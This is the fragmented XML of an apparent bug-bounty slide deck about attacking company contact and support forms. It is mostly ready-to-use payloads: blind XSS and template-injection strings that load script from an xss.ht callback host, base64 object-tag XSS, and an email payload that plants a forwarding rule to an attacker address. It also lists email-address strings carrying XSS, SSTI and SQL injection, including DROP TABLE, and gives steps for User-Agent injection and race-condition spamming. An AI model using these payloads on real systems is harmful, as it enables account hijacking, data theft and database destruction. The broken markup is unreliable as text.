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Arial Black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07b8690e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07b8690e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07b8690e7_1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07b8690e7_1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07b8690e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07b8690e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7b8690e7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7b8690e7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07b8690e7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07b8690e7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07b8690e7_1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07b8690e7_1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07b8690e7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07b8690e7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7b8690e7_1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07b8690e7_1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07b8690e7_1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07b8690e7_1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07b8690e7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07b8690e7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07b8690e7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07b8690e7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hackerone.com/reports/98229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hackerone.com/reports/878145" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2018.zeronights.ru/wp-content/uploads/materials/2%20ZN2018%20WV%20-%20Blind%20Xss%20%28femida%20plugin%29.pdf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hackerone.com/reports/19733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twitter.com/intigriti/status/1323614674143846403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twitter.com/m4ll0k/status/1288456254902411265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hackerone.com/reports/787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speakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=5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hyperlink" Target="https://twitter.com/intigriti/status/1103705724826411009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s://www.youtube.com/watch?v=cThFNXrBYQU" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hunter0x7/status/132114988376464589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twitter.com/intigriti/status/1078318258661531648" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1318532648734773249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s://twitter.com/Haoneses/status/1292456202857742338" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=cThFNXrBYQU" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b1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st.githubusercontent.com/jstnkndy/451bb51ca118c14989982f9ce8df5e44/raw/70e9df60d320b61c891c6efbe1dd6981c2bc02c1/gistfile1.txt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twitter.com/NahamSec/status/1162060338696613889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twitter.com/securinti/status/908348405650522113" TargetMode="External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hyperlink" Target="https://hackerone.com/reports/4137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Contact</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="72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Support Of The Company</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="24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4827250" y="2044550"/>
            <a:ext cx="39165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Email Address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4827249" y="2511600"/>
            <a:ext cx="39165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Describe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Your Issue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4827249" y="2978650"/>
            <a:ext cx="39165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Message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1" name="Google Shape;331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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can't</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Find The Contact Form </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use Admin Email Then Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blind XSS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XSS Payloads By Using Sendmail </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tool In Linux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4" name="Google Shape;3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Steps to produce :-</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:b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1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open Your Terminal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rgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cat payload.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEF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From: jouko@klikki.fi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To: jouko@hey.com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Subject: HackerOne test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MIME-Version: 1.0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Content-type: text/html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&lt;style&gt;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url(cid://\00003c\000027message-content\00003e\00003ctemplate\00003e\00003cstyle\00003exxx);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url(cid://\00003c/style\00003e\00003c/template\00003e\00003c/message-content\00003e\00003cform\000020action=/my/accounts/266986/forwardings/outbounds\000020data-controller=beacon\00003e\00003cinput\000020type=text\000020name=contact_outbound_forwarding[to_email_address]\000020value=joukop@gmail.com\00003e\00003c/form\00003exxx);</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="600">
              <a:solidFill>
                <a:srgbClr val="00FF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&lt;/style&gt;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3 - sendmail -t &lt; payload.txt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336" name="Google Shape;33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0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4" name="Google Shape;344;p50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Blind XSS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Payloads e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=https://me.xss.ht&gt;&lt;/script&gt;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In All </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Field</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get BXSS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/contact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email=me@gmail.com&amp;title=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=https://me.xss.ht&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;meassage=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=https://me.xss.ht&gt;&lt;/script&gt;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475" y="3514700"/>
            <a:ext cx="462101" cy="36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Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Blind Template Injection Payloads e.g. {{constructor.constructor('import("http://me.xss.ht")')()}} </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On All Field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Blind XSS On The Admin Panel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9" name="Google Shape;229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contact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email=me@gmail.com&amp;title=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{constructor.constructor('import("http://me.xss.ht")')()}}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;message=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{constructor.constructor('import("http://me.xss.ht")')()}}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Blind Template Injection Payloads e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;img src=https://me.xss.ht/${{7*7}}.jpg&gt;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On All Field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SSTI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1" name="Google Shape;241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/contact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email=me@gmail.com&amp;title=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;img src=https://me.xss.ht/${{7*7}}.jpg&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;message=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;img src=https://me.xss.ht/${{7*7}}.jpg&gt;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3" name="Google Shape;253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 sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blind XSS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XSS Payloads e.g. &lt;object data=data:text/html;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base64,BXSS OR XSS Base64 Encoding&gt;&lt;/object&gt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In Body Of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Message</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get XSS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/contact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email=me@gmail.com&amp;title=Issue&amp;meassage=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object data=data:text/html;base64,Ij48aW1nIHNyYz0vL21lLnhzcy5odD4=&gt;&lt;/object&gt;?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Contact Support Of The Company By Using This List With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Collaborator Mail Address </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Backend Information OR Internal IPs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user(;me@id.collaborator.net)@gmail.com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me@id.collaborator.net(@gmail.com)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me+(@gmail.com)@id.collaborator.net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&lt;me@id.collaborator.net&gt;user@gmail.com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25" y="433147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5" name="Google Shape;285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Contact Support Of The Company</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> By Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This List Of Payloads As Email Addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get XSS , SSTI , SQLi OR Abusing Of Database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me@gmail(&lt;script&gt;alert(0)&lt;/script&gt;).com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"&lt;script&gt;alert(0)&lt;/script&gt;"@gmail.com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"&lt;%= 7 * 7 %&gt;"@gmail.com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me+(${{7*7}})@gmail.com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"' OR 1=1 -- '"@gmail.com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"me); DROP TABLE users;--"@gmail.com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me@[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.collaborator.net]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%@gmail.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1250">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill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43394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Contacting Support Of The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replace User Agent Header To Blind XSS e.g.  User-Agent: "&gt;&lt;script src=https://me.xss.ht/"&gt;&lt;/script&gt;");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 Use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BurpBXSS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contact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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=https://me.xss.ht/"&gt;&lt;/script&gt;");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email=me@gmail.com&amp;title=issue&amp;meassage=hi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Contacting Support Of The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Race Condition Technique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Send </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Multiple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Message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9" name="Google Shape;319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While Sending </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Intercept</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Request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Send To Turbo Intruder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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Race File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Do Race Condition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